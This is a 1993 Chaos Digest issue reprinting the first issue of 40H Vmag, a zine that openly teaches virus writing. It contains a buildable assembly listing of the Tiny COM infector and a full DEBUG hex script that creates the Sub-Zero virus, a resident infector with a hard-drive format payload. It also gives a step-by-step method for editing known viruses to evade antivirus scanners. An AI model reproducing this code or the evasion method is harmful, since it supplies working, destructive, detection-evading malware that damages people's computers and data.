home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / KAOS1_25.ZIP / KAOS1-25
Text File  |  1993-05-17  |  24KB  |  624 lines

  1. Chaos Digest             Lundi 17 Mai 1993          Volume 1 : Numero 25
  2.                           ISSN  1244-4901
  3.  
  4.        Editeur: Jean-Bernard Condat (jbcondat@attmail.com)
  5.        Archiviste: Yves-Marie Crabbe
  6.        Co-Redacteurs: Arnaud Bigare, Stephane Briere
  7.  
  8. TABLE DES MATIERES, #1.25 (17 Mai 1993)
  9. File 1--40H VMag Issue 1 Volume 1 #000-3 (reprint)
  10.  
  11. Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
  12. available at no cost by sending a message to:
  13.                 linux-activists-request@niksula.hut.fi
  14. with a mail header or first line containing the following informations:
  15.                     X-Mn-Admin: join CHAOS_DIGEST
  16.  
  17. The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
  18. or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
  19. 155, 93404 St-Ouen Cedex, France.  He is a member of the EICAR and EFF (#1299)
  20. groups.
  21.  
  22. Issues of ChaosD can also be found on some French BBS.  Back issues of
  23. ChaosD can be found on the Internet as part of the Computer underground
  24. Digest archives.  They're accessible using anonymous FTP from:
  25.  
  26.         * kragar.eff.org [192.88.144.4] in /pub/cud/chaos
  27.         * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
  28.         * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
  29.         * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
  30.         * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
  31.         * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
  32.         * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos
  33.  
  34. CHAOS DIGEST is an open forum dedicated to sharing French information among
  35. computerists and to the presentation and debate of diverse views. ChaosD
  36. material may be reprinted for non-profit as long as the source is cited.
  37. Some authors do copyright their material, and they should be contacted for
  38. reprint permission.  Readers are encouraged to submit reasoned articles in
  39. French, English or German languages relating to computer culture and
  40. telecommunications.  Articles are preferred to short responses.  Please
  41. avoid quoting previous posts unless absolutely necessary.
  42.  
  43. DISCLAIMER: The views represented herein do not necessarily represent
  44.             the views of the moderators. Chaos Digest contributors
  45.             assume all responsibility for ensuring that articles
  46.             submitted do not violate copyright protections.
  47.  
  48. ----------------------------------------------------------------------
  49.  
  50. Date: Tue May 11 09:24:40 PDT 1993
  51. From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
  52. Subject: File 1--40H VMag Issue 1 Volume 1 #000-3 (reprint)
  53.  
  54.  
  55. 40H Vmag Issue 1 Volume 1                                               00000
  56.  
  57. Introduction -
  58.  
  59. This is a down and dirty zine on wich gives examples on writing viruses
  60. and this magazines contains code that can be compiled to viruses.
  61.  
  62. If you are an anti-virus pussy, who is just scared that your hard disk will
  63. get erased so you have a psycological problem with viruses, erase these files.
  64. This aint for you.
  65.  
  66.                                  INDEX
  67.  
  68. 001...........................Virus Spotlight, The Tiny virus
  69. 002...........................How to modify viruses to avoid SCAN
  70. 003...........................Sub-Zero virus
  71. 004...........................Simple encryption techniques and Leprosy-B
  72. 005...........................1992 virus
  73.  
  74. Staff -
  75.  
  76.         Editior, Technical Consultant - Hellraiser
  77.         Co-Editor, Theory Consultant  - Bionic Slasher
  78.  
  79. +++++
  80.  
  81. 40H Vmag Issue 1 Volume 1                                               00001
  82.  
  83.                           - VIRUS SPOTLIGHT -
  84.  
  85.      The first virus I would like to spotlight is the Tiny virus, lets see
  86. what our good friend Patti Hoffman (bitch) has written about it.
  87.  
  88. Name:        Tiny
  89. Aliases:     163 COM Virus, Tiny 163 Virus, Kennedy-163
  90. V Status:    Rare
  91. Discovery:   June, 1990
  92. Symptoms:    COMMAND.COM & .COM file growth
  93. Origin:      Denmark
  94. Eff Length:  163 Bytes
  95. Type Code:   PNCK - Parasitic Non-Resident .COM Infector
  96. Detection Method:  ViruScan V64+, VirexPC, F-Prot 1.12+, NAV, IBM Scan 2.00+
  97. Removal Instructions: Scan/D, F-Prot 1.12+, or Delete infected files
  98. General Comments:
  99.       The 163 COM Virus, or Tiny Virus, was isolated by Fridrik Skulason
  100.       of Iceland in June 1990.  This virus is a non-resident generic
  101.       .COM file infector, and it will infect COMMAND.COM.
  102.  
  103.       The first time a file infected with the 163 COM Virus is executed,
  104.       the virus will attempt to infect the first .COM file in the
  105.       current directory.  On bootable diskettes, this file will normally
  106.       be COMMAND.COM.  After the first .COM file is infected,each time
  107.       an infected program is executed another .COM file will attempt to
  108.       be infected.  Files are infected only if their original length is
  109.       greater than approximately 1K bytes.
  110.  
  111.       Infected .COM files will increase in length by 163 bytes, and have
  112.       date/time stamps in the directory changed to the date/time the
  113.       infection occurred.  Infected files will also always end with this
  114.       hex string: '2A2E434F4D00'.
  115.  
  116.       This virus currently does nothing but replicate, and is the
  117.       smallest MS-DOS virus known as of its isolation date.
  118.  
  119.       The Tiny Virus may or may not be related to the Tiny Family.
  120.       ^like she'd know the difference!
  121.  
  122. OK, Theres the run down on the smallest MS-DOS virus known to man.  As for
  123. it being detected by SCAN we'll see about that.
  124.  
  125. Here is a dissasembly of the virus, It can be assembled under Turbo Assembler
  126. or MASM.
  127.  
  128. -----------------------------------------------------------------------------
  129.  
  130. PAGE  59,132
  131.  
  132. data_2e         equ     1ABh                 ;start of virus
  133.  
  134. seg_a           segment byte public
  135.                 assume  cs:seg_a, ds:seg_a   ;assume cs, ds - code
  136.  
  137.                 org     100h                 ;orgin of all COM files
  138. s               proc    far
  139.  
  140. start:
  141.                 jmp     loc_1                ;jump to virus
  142.  
  143. ;this is a replacement for an infected file
  144.  
  145.                 db      0CDh, 20h, 7, 8, 9   ;int 20h
  146.                                              ;pop es
  147.  
  148. loc_1:
  149.                 call    sub_1
  150.  
  151. s               endp
  152.  
  153. sub_1           proc    near
  154.                 pop     si                   ;locate all virus code via
  155.                 sub     si,10Bh              ;si, cause all offsets will
  156.                 mov     bp,data_1[si]        ;change when virus infects
  157.                 add     bp,103h              ;a COM file
  158.                 lea     dx,[si+1A2h]         ;offset of '*.COM',0 - via SI
  159.                 xor     cx,cx                ;clear cx - find only normal
  160.                                              ;attributes
  161.                 mov     ah,4Eh               ;find first file
  162. loc_2:
  163.                 int     21h
  164.  
  165.                 jc      loc_6                ;no files found? then quit
  166.                 mov     dx,9Eh               ;offset of filename found
  167.                 mov     ax,3D02h             ;open file for read/write access
  168.                 int     21h
  169.  
  170.                 mov     bx,ax                ;save handle into bx
  171.                 mov     ah,3Fh               ;read from file
  172.                 lea     dx,[si+1A8h]         ;offset of save buffer
  173.                 mov     di,dx
  174.                 mov     cx,3                 ;read three bytes
  175.                 int     21h
  176.  
  177.                 cmp     byte ptr [di],0E9h   ;compare buffer to virus id
  178.                                              ;string
  179.                 je      loc_4
  180. loc_3:
  181.                 mov     ah,4Fh               ;find the next file
  182.                 jmp     short loc_2          ;and test it
  183. loc_4:
  184.                 mov     dx,[di+1]            ;lsh of offset
  185.                 mov     data_1[si],dx
  186.                 xor     cx,cx                ;msh of offset
  187.                 mov     ax,4200h             ;set the file pointer
  188.                 int     21h
  189.                 mov     dx,di                ;buffer to save read
  190.                 mov     cx,2                 ;read two bytes
  191.                 mov     ah,3Fh               ;read from file
  192.                 int     21h
  193.                 cmp     word ptr [di],807h   ;compare buffer to virus id
  194.                 je      loc_3                ;same? then find another file
  195.  
  196. ;heres where we infect a file
  197.  
  198.                 xor     dx,dx                ;set file pointer
  199.                 xor     cx,cx                ;ditto
  200.                 mov     ax,4202h             ;set file pointer
  201.                 int     21h
  202.  
  203.                 cmp     dx,0                 ;returns msh
  204.                 jne     loc_3                ;not the same? find another file
  205.                 cmp     ah,0FEh              ;lsh = 254???
  206.                 jae     loc_3                ;if more or equal find another
  207. file
  208.  
  209.                 mov     ds:data_2e[si],ax    ;point to data
  210.                 mov     ah,40h               ;write to file
  211.                 lea     dx,[si+105h]         ;segment:offset of write buffer
  212.                 mov     cx,0A3h              ;write 163 bytes
  213.                 int     21h
  214.  
  215.                 jc      loc_5                ;error? then quit
  216.                 mov     ax,4200h             ;set file pointer
  217.                 xor     cx,cx                ;to the top of the file
  218.                 mov     dx,1
  219.                 int     21h
  220.  
  221.                 mov     ah,40h               ;write to file
  222.                 lea     dx,[si+1ABh]         ;offset of jump to virus code
  223.                 mov     cx,2                 ;two bytes
  224.                 int     21h
  225.  
  226. ;now close the file
  227.  
  228. loc_5:
  229.                 mov     ah,3Eh               ;close file
  230.                 int     21h
  231.  
  232. loc_6:
  233.                 jmp     bp                   ;jump to original file
  234.  
  235. data_1          dw      0
  236.                 db      '*.COM',0            ;wild card search string
  237.  
  238.  
  239. sub_1           endp
  240. seg_a           ends
  241.                 end     start
  242.  
  243. ---------------------------------------------------------------------------
  244.  
  245. Its good to start off with a simple example like this.  As you can see
  246. what the virus does is use the DOS 4Eh function to find the firsy COM file
  247. in the directory.  If no files are found the program exits.  If a file is
  248. found it compares the virus id string (the virus jump instruction) to the
  249. first two bytes of the COM file.  If they match the program terminates.
  250. If they don't match the virus will infect the file.  Using two key MS-DOS
  251. functions to infect.
  252.  
  253. The first -
  254.  
  255. INT 21h Function 42h
  256. SET FILE POINTER
  257.  
  258. AH   =   42h
  259. AL   =   method code
  260. BX   =   file handle
  261. CX   =   most significant half to offset
  262. DX   =   least "                       "
  263.  
  264. If there is an error in executing this function the carry flag will be set,
  265. and AX will contian the error code.  If no error is encountered
  266.  
  267. DX   =   most significant half of file pointer
  268. AX   =   least "                             "
  269.  
  270. The second (and most) important function used by any virus is
  271.  
  272. INT 21h Function 40h
  273. WRITE TO FILE OR DEVICE
  274.  
  275. AH    =   40h
  276. BX    =   handle
  277. CX    =   number of bytes to write
  278. DS:DX =   segment of buffer
  279.  
  280. Returns
  281.  
  282. AX    =   bytes transferred
  283.  
  284. on error
  285.  
  286. AX    =  Error Code and flag is set.
  287.  
  288. An example of Function 40h is ----
  289.  
  290.      mov     ah,40h                   ;set function
  291.      mov     bx,handle                ;load bx with handle from prev open
  292.      mov     cx,virus_size            ;load cx with # of bytes to write
  293.      mov     dx,offset write_buffer   ;load dx with the offset of what to
  294.                                       ;write to file
  295.      int     21h                      ;
  296.  
  297. This function is used by 98% of all MS-DOS viruses to copy itself to a
  298. victim file.
  299.  
  300. Now heres a sample project -  create a new strain of Tiny, have it restore
  301. the original date and time etc...
  302.  
  303.                                                                           HR
  304.  
  305. +++++
  306.  
  307. 40H Vmag Issue 1 Volume 1                                               00002
  308.  
  309.              -  HOW TO MODIFY A VIRUS SO SCAN WON'T CATCH IT -
  310.                                    OR
  311.                      HOW TO CREATE NEW VIRUS STRAINS
  312.  
  313.  
  314. The problem with most viruses is that this dickhead who lives in California
  315. named John Mcafee gets his greedy hands on them and turns them into big
  316. bucks -- for him.   John boy is the reason there are over 500 viruses out
  317. there, and I wouldn't doubt if he weren't resposible for  writing at least
  318. ten of them.
  319.  
  320. So the best thing to do to some Mcafee dependant sucker, or lame board is
  321. this.
  322.  
  323. Say you have a copy of a played out virus, lets say an older one like
  324. Armstand or Jerusalem.  Almost every virus scanner can detect these
  325. viruses cause they been around so long.  Now heres a quick way to modify
  326. viruses so the scanners wont catch them, in turn making them new strains.
  327.  
  328. The tools you need are --
  329.  
  330.                           Norton Utilites
  331.                           Debug          and/or
  332.                           Turbo Debugger by Borland
  333.  
  334. Now heres what you do.
  335.  
  336. Step A
  337. ------
  338.  
  339. Make a target file like this with Debug
  340.  
  341. Copy the below file with your editor to a file called SAMPLE.USR
  342.  
  343. -----------------------------------------------------------------------------
  344. n sample.com
  345. a
  346. int 20
  347.  
  348. rcx
  349. 2
  350. w
  351. q
  352. -----------------------------------------------------------------------------
  353. Then uses Debug to make the file SAMPLE.COM executing this command --
  354.  
  355. DEBUG < SAMPLE.USR
  356.  
  357. This will make a two byte called SAMPLE.COM
  358.  
  359. STEP B
  360. ------
  361.  
  362. Infect the file with the virus.  If this is a boot sector virus your on
  363. your own.  Do whatever you have to to infect the two byte file.
  364.  
  365. Make a copy of the file and keep it for safe keeping.
  366.  
  367. STEP C
  368. ------
  369.  
  370. Load up DISKEDIT, which comes with Norton 6.0 (I'm not sure if its in the
  371. lower versions) PCTOOLS Hex Editor will work too but it takes more work.
  372.  
  373. Now have DISKEDIT Hex-edit the infected file.
  374.  
  375. Now figure out where the middle of the file is.  Next put block on and
  376. go to the end of the file.  At the end of the file go to the edit screen and
  377. select fill.  Fill the lower half of the file will nonsense characters, its
  378. good to select 255d (FFh) the blank character.
  379.  
  380. Now save your changes and go to DOS
  381.  
  382. Now use SCAN to scan the file for viruses.  If it detects the virus you
  383. didnt delete the search string that SCAN is searching for.  Get it???
  384.  
  385. You see all SCAN does is search files for strings that are related to viruses.
  386. For example if SCAN was looking for CASCADE it look for something like this-
  387.  
  388.                         EB1DAD1273D1FF121F
  389.  
  390. In every file you specify.  So what we are doing is narrowing down where that
  391. string is in the virus that SCAN keeps finding.
  392.  
  393. So what you have to do is keep deleting parts of the virus with DISKEDIT
  394. untill you finally narrow down the string.
  395.  
  396. Keep this in mind, search strings are in the first 150 bytes of the file
  397. about 75% of the time.
  398.  
  399. Ok lets say you narrowed down the search string and lets say it's -
  400.  
  401.                       B8 92 19 B7 21 CD
  402.  
  403. It will most likly be longer but this an example.
  404.  
  405. Now back to DEBUG - Do the following--
  406.  
  407. DEBUG
  408.  
  409. E 0100 b8 92 19 b7 21 cd    -- this is the string you found
  410.  
  411. Then type --
  412.  
  413. U
  414.  
  415. This will give you a unassembled look at what the id-string is.  In this
  416. example it was
  417.  
  418.                        mov  ax,1992h
  419.                        mov  bx,21h
  420.                        int  21h
  421.  
  422. Now this is what you have to do, and keep in mind the following ---
  423.  
  424. THE FOLLOWING TAKES A SOMEWHAT KNOWING OF ASSEMBLER AND HOW IT WORKS!!!!!!
  425.  
  426. Uses Turbo Debugger to find the string, you can use DEBUG but I don't know
  427. how to do this from debug.
  428.  
  429. Ok say you got the string on the screen --
  430.  
  431.                        mov  ax,1992h
  432.                        mov  bh,21h
  433.                        int  21h
  434.  
  435. Write down the locations in the file where these strings are.  Ex 0100h etc..
  436.  
  437. Now rearrange the AX mov with the BX mov like this ---
  438.  
  439.                         mov bh,21h
  440.                         mov ax,1992h
  441.                         int 21h
  442.  
  443. You see?  You didn't change the way the code functions (THATS IF YOU KNOW
  444. WHAT YOUR DOING!) but you changed the codes id-string for SCAN.
  445.  
  446. Now since Turbo Debugger dosent let you save the changes you must do it
  447. via - Debug.
  448.  
  449. DEBUG virus.com
  450.  
  451. a 0122  - This is the address of the string
  452.  
  453. Now enter the assembler instructions --
  454.  
  455.                          mov bh,21
  456.                          mov ax,1992h
  457.                          int 21h
  458.  
  459. w
  460.  
  461. q
  462.  
  463. Save it and SCAN it, if SCAN doesn't catch it Congrats.  If it does ---
  464. back to the lab.  Oh well you get the point.
  465.  
  466. One warning, this only works with un-encrypting viruses, or on the
  467. encryption mechanism of encrypting files (which will most likely be Scanned).
  468.  
  469. With that in mind, have fun.
  470.  
  471.                                                                            HR
  472.  
  473. +++++
  474.  
  475. 40H Vmag Issue 1 Volume 1                                               00003
  476.  
  477.                            - SUB-ZERO VIRUS -
  478.  
  479.     Heres one for all of you who don't have an assembler.  It can be
  480. compiled using debug by naming the insert below SUB-ZERO.USR and
  481. executing the command -
  482.  
  483.                         DEBUG < SUB-ZERO.USR
  484.  
  485. -----------------------------------------------------------------------------
  486. n sub-zero.com
  487. e 0100  E9 92 00 DA AA A3 AA D4 3A A3 00 01 23 31 00 00
  488. e 0110  00 02 00 04 01 64 30 A0 06 55 2E 56 05 9F 19 A5
  489. e 0120  3E 00 00 00 00 00 00 00 00 00 00 00 00 00 E8 06
  490. e 0130  0E 97 30 80 00 00 00 80 00 97 30 5C 00 97 30 6C
  491. e 0140  00 97 30 00 40 46 63 F4 1D D0 5C 00 00 46 00 4D
  492. e 0150  5A A0 01 39 00 B4 02 AF 00 7C 04 7C A4 FA 05 10
  493. e 0160  07 84 19 C5 00 FA 05 1C 00 00 00 00 00 00 00 00
  494. e 0170  05 00 20 00 21 00 28 02 00 02 10 00 90 6A 00 00
  495. e 0180  B9 41 2A 97 4C 4F 52 44 20 53 4B 49 53 4D 20 01
  496. e 0190  00 00 00 00 00 FC B4 E0 CD 21 3D 00 E0 73 16 80
  497. e 01A0  FC 03 72 11 BF 00 01 B4 DD BE 10 07 03 F7 2E 8B
  498. e 01B0  8D 11 00 CD 21 8C C8 04 10 00 8E D0 BC 00 07 50
  499. e 01C0  B8 C5 00 50 CB 06 FC 2E 8C 06 31 00 2E 8C 06 39
  500. e 01D0  00 2E 8C 06 3D 00 2E 8C 06 41 00 8C C0 05 10 00
  501. e 01E0  2E 01 06 49 00 2E 01 06 45 00 B4 E0 CD 21 80 FC
  502. e 01F0  E0 73 13 80 FC 03 07 2E 8E 16 45 00 2E 8B 26 43
  503. e 0200  00 2E FF 2E 47 00 33 C0 8E C0 8B 89 31 DB 2E A3
  504. e 0210  4B 00 26 A0 FE 03 2E A2 4D 00 26 C7 06 FC 03 F3
  505. e 0220  A5 26 C6 06 FE 03 CB 58 04 10 90 8E C0 0E 1F B9
  506. e 0230  00 03 B1 88 33 F6 8B FE 06 B8 42 01 50 EA FC 03
  507. e 0240  00 00 8C C8 8E D0 BC 00 07 33 C0 8E D8 2E A1 4B
  508. e 0250  00 A3 FC 03 2E A0 4D 00 A2 FE 03 8B DC B1 04 D3
  509. e 0260  EB 83 C3 10 2E 89 1E 33 00 B4 4A 2E 8E 06 31 00
  510. e 0270  CD 21 B8 21 35 CD 21 2E 89 1E 17 00 2E 8C 06 19
  511. e 0280  00 0E 1F BA 5B 02 B8 21 25 CD 21 8E 06 31 00 26
  512. e 0290  8E 06 2C 00 33 FF B9 FF 7F 32 C0 F2 AE 26 38 05
  513. e 02A0  E0 F9 8B D7 83 C2 03 B8 00 4B 06 1F 0E 07 BB 35
  514. e 02B0  00 52 51 53 50 06 1E B4 2A CD 21 2E C6 06 0E 00
  515. e 02C0  00 81 F9 C6 07 74 30 3C 05 75 0D 80 FA 17 72 08
  516. e 02D0  2E FE 06 0E 00 EB 20 90 B8 08 35 CD 21 2E 89 1E
  517. e 02E0  13 00 2E 8C 06 15 00 0E 1F C7 06 1F 00 48 3F B8
  518. e 02F0  08 25 BA 1E 02 CD 21 1F 07 58 5B 59 5A 9C 2E FF
  519. e 0300  1E 17 00 1E 07 B4 49 CD 21 B4 4D CD 21 B4 31 BA
  520. e 0310  00 06 B1 04 D3 EA 83 C2 10 CD 21 32 C0 CF 2E 83
  521. e 0320  3E 1F 00 09 75 17 52 51 50 B4 2A CD 21 81 FA 06
  522. e 0330  06 75 07 B8 01 07 B2 80 CD 13 58 59 5A 2E 83 2E
  523. e 0340  1F 00 01 EB 11 20 20 53 75 62 2D 5A 65 72 6F 20
  524. e 0350  4E 59 48 43 20 20 2E FF 2E 13 00 9C 80 FC E0 75
  525. e 0360  05 B8 00 03 9D CF 80 FC DE 74 2D 80 FC DD 74 0E
  526. e 0370  3D 00 4B 75 03 E9 B4 00 9D 2E FF 2E 17 00 58 58
  527. e 0380  B8 00 01 2E A3 0A 00 58 2E A3 0C 00 F3 A4 9D 2E
  528. e 0390  A1 0F 00 2E FF 2E 0A 00 83 C4 06 9D 8C C8 8E D0
  529. e 03A0  BC 10 07 06 06 33 FF 0E 07 B9 10 00 8B F3 BF 21
  530. e 03B0  00 F3 A4 8C D8 8E C0 2E F7 26 7A 00 2E 03 06 2B
  531. e 03C0  00 83 D2 00 2E F7 36 7A 00 8E D8 8B F2 8B FA 8C
  532. e 03D0  C5 2E 8B 1E 2F 00 0B DB 74 13 B9 00 80 F3 A5 05
  533. e 03E0  00 10 81 C5 00 10 8E D8 8E C5 4B 75 ED 2E 8B 0E
  534. e 03F0  2D 00 F3 A4 58 50 05 10 00 2E 01 06 29 00 2E 01
  535. e 0400  06 25 00 2E A1 21 00 1F 07 2E 8E 16 29 00 2E 8B
  536. e 0410  26 27 00 2E FF 2E 23 00 33 C9 B8 01 43 CD 21 B4
  537. e 0420  3C CD 21 B8 00 4B 9D 2E FF 2E 17 00 2E 80 3E 0E
  538. e 0430  00 01 74 E4 2E C7 06 70 00 FF FF 2E C7 06 8F 00
  539. e 0440  00 00 2E 89 16 80 00 2E 8C 1E 82 00 50 53 51 52
  540. e 0450  56 57 1E 06 FC 8B FA 32 D2 80 7D 01 3A 75 05 8A
  541. e 0460  15 80 E2 1F B4 36 CD 21 3D FF FF 75 03 E9 77 02
  542. e 0470  F7 E3 F7 E1 0B D2 75 05 3D 10 07 72 F0 2E 8B 16
  543. e 0480  80 00 1E 07 32 C0 B9 41 00 F2 AE 2E 8B 36 80 00
  544. e 0490  8A 04 0A C0 74 0E 3C 61 72 07 3C 7A 77 03 80 2C
  545. e 04A0  20 46 EB EC B9 0B 00 2B F1 BF 84 00 0E 07 B9 0B
  546. e 04B0  00 F3 A6 75 03 E9 2F 02 B8 00 43 CD 21 72 05 2E
  547. e 04C0  89 0E 72 00 72 25 32 C0 2E A2 4E 00 1E 07 8B FA
  548. e 04D0  B9 41 00 F2 AE 80 7D FE 4D 74 0B 80 7D FE 6D 74
  549. e 04E0  05 2E FE 06 4E 00 B8 00 3D CD 21 72 5A 2E A3 70
  550. e 04F0  00 8B D8 B8 02 42 B9 FF FF BA FB FF CD 21 72 EB
  551. e 0500  05 05 00 2E A3 11 00 B9 05 00 BA 6B 00 8C C8 8E
  552. e 0510  D8 8E C0 B4 3F CD 21 8B FA BE 05 00 F3 A6 75 07
  553. e 0520  B4 3E CD 21 E9 C0 01 B8 24 35 CD 21 89 1E 1B 00
  554. e 0530  8C 06 1D 00 BA 1B 02 B8 24 25 CD 21 C5 16 80 00
  555. e 0540  33 C9 B8 01 43 CD 21 72 3B 2E 8B 1E 70 00 B4 3E
  556. e 0550  CD 21 2E C7 06 70 00 FF FF B8 02 3D CD 21 72 24
  557. e 0560  2E A3 70 00 8C C8 8E D8 8E C0 8B 1E 70 00 B8 00
  558. e 0570  57 CD 21 89 16 74 00 89 0E 76 00 B8 00 42 33 C9
  559. e 0580  8B D1 CD 21 72 3D 80 3E 4E 00 00 74 03 EB 57 90
  560. e 0590  BB 00 10 B4 48 CD 21 73 0B B4 3E 8B 1E 70 00 CD
  561. e 05A0  21 E9 43 01 FF 06 8F 00 8E C0 33 F6 8B FE B9 10
  562. e 05B0  07 F3 A4 8B D7 8B 0E 11 00 8B 1E 70 00 06 1F B4
  563. e 05C0  3F CD 21 72 1C 03 F9 33 C9 8B D1 B8 00 42 CD 21
  564. e 05D0  BE 05 00 B9 05 00 F3 2E A4 8B CF 33 D2 B4 40 CD
  565. e 05E0  21 72 0D E9 BC 00 B9 1C 00 BA 4F 00 B4 3F CD 21
  566. e 05F0  72 4A C7 06 61 00 84 19 A1 5D 00 A3 45 00 A1 5F
  567. e 0600  00 A3 43 00 A1 63 00 A3 47 00 A1 65 00 A3 49 00
  568. e 0610  A1 53 00 83 3E 51 00 00 74 01 48 F7 26 78 00 03
  569. e 0620  06 51 00 83 D2 00 05 0F 00 83 D2 00 25 F0 FF A3
  570. e 0630  7C 00 89 16 7E 00 05 10 07 83 D2 00 72 3A F7 36
  571. e 0640  78 00 0B D2 74 01 40 A3 53 00 89 16 51 00 A1 7C
  572. e 0650  00 8B 16 7E 00 F7 36 7A 00 2B 06 57 00 A3 65 00
  573. e 0660  C7 06 63 00 C5 00 A3 5D 00 C7 06 5F 00 10 07 33
  574. e 0670  C9 8B D1 B8 00 42 CD 21 72 0A B9 1C 00 BA 4F 00
  575. e 0680  B4 40 CD 21 72 11 3B C1 75 18 8B 16 7C 00 8B 0E
  576. e 0690  7E 00 B8 00 42 CD 21 72 09 33 D2 B9 10 07 B4 40
  577. e 06A0  CD 21 2E 83 3E 8F 00 00 74 04 B4 49 CD 21 2E 83
  578. e 06B0  3E 70 00 FF 74 31 2E 8B 1E 70 00 2E 8B 16 74 00
  579. e 06C0  2E 8B 0E 76 00 B8 01 57 CD 21 B4 3E CD 21 2E C5
  580. e 06D0  16 80 00 2E 8B 0E 72 00 B8 01 43 CD 21 2E C5 16
  581. e 06E0  1B 00 B8 24 25 CD 21 07 1F 5F 5E 5A 59 5B 58 9D
  582. e 06F0  2E FF 2E 17 00 00 00 00 00 00 00 00 00 00 00 00
  583. e 0700  4D 9F 19 00 10 00 00 00 45 44 00 45 4C 00 00 00
  584. e 0710  E9 92 00 DA AA A3 AA D4 3A A3 00 01 23 31 00 00
  585. e 0720  00 02 00 04 01 64 30 A0 06 55 2E 56 05 9F 19 A5
  586. e 0730  3E 00 00 00 00 00 00 00 00 00 00 00 00 00 E8 06
  587. e 0740  0E 97 30 80 00 00 00 80 00 97 30 5C 00 97 30 6C
  588. e 0750  00 97 30 00 40 46 63 F4 1D D0 5C 00 00 46 00 4D
  589. e 0760  5A A0 01 39 00 B4 02 AF 00 7C 04 7C A4 FA 05 10
  590. e 0770  07 84 19 C5 00 FA 05 1C 00 00 00 00 00 00 00 00
  591. e 0780  05 00 20 00 21 00 28 02 00 02 10 00 90 6A 00 00
  592. e 0790  B9 41 2A 97 4C 4F 52 44 20 53 4B 49 53 4D 20 01
  593. e 07A0  00 00 00 00 00 FC B4 E0 CD 21 3D 00 E0 73 16 80
  594. e 07B0  FC 03 72 11 BF 00 01 B4 DD BE 10 07 03 F7 2E 8B
  595. e 07C0  8D 11 00 CD 21 8C C8 04 10 00 8E D0 BC 00 07 50
  596. e 07D0  B8 C5 00 50 CB 06 FC 2E 8C 06 31 00 2E 8C 06 39
  597. e 07E0  00 2E 8C 06 3D 00 2E 8C 06 41 00 8C C0 05 10 00
  598. e 07F0  2E 01 06 49 00 2E 01 06 45 00 B4 E0 CD 21 80 FC
  599. e 0800  E0 73 13 80 FC 03 07 2E 8E 16 45 00 2E 8B 26 43
  600. e 0810  CD 20 A3 AA D4 3A A3 1A 1A 1A 1A 1A 1A 1A 1A 1A
  601.  
  602. rcx
  603. 717
  604. w
  605. q
  606. ----------------------------------------------------------------------------
  607.  
  608. Sub-Zero is a memory resident COM and EXE infector that is based somewhat on
  609. on Jerusalem-B.  It is the ansestor to the virus Captian Trips
  610. which at this time has not been nailed by SCAN.
  611.  
  612. Be carefull because this virus will most likly format you hard drive if you
  613. run it on the wrong day.  One day of the year it will perform a HD format.
  614. I think it's in June, hmmmm...  D-Day rings a bell.
  615.  
  616. As of Scan-77 this virus can not be detected by SCAN or F-Prot.
  617.  
  618.                                                                            HR
  619.  
  620. ------------------------------
  621.  
  622. End of Chaos Digest #1.25
  623. ************************************
  624.